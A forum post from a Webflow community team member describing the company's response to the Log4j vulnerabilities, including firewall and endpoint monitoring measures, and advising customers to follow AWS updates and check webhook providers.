Hi all! Matthew here from Webflow’s Community Team, following up regarding the Apache Log4j vulnerability issue.
Webflow’s platform is not built upon Java, nor uses Log4j directly. We are aware of the follow up CVEs: CVE 2021-45046 and CVE-2021-45105, and have mitigated these issues. At this time, we have completed all tasks that we are able to directly mitigate, and we will continue to monitor our downstream partners.*
Here are the actions Webflow has taken:
- We have enabled Web Application Firewall (WAF) detection and blocking rules against this vector, and confirmed coverage of all server and API endpoints.*
- We have further validated our WAF rules and confirmed that our coverage is complete.*
- We have engaged vendors and downstream dependent partners to assess if they are affected, and monitor their efforts to remediate.*
- We have implemented rules within our EDR tools to monitor corporate and employee endpoints.*
Here are the actions we recommend our customers take at this time:*
- We recommend that you follow* AWS’s Log4j updates , as we are unable to push Amazon AWS to accelerate patching these services. We ask that you follow those updates directly instead of relying on us to relay this information.
- If any of your sites have forms with webhooks configured, that data is sent to your webhook service provider, and may include JNDI payloads. We advise that you follow up with any service providers handling those requests and ensure they have mitigated this vector.*
We hope the information shared here is helpful! Please feel free to reach out to our Customer Support Team (email@example.com) with any additional questions, concerns, or feedback, and we’ll be happy to assist.*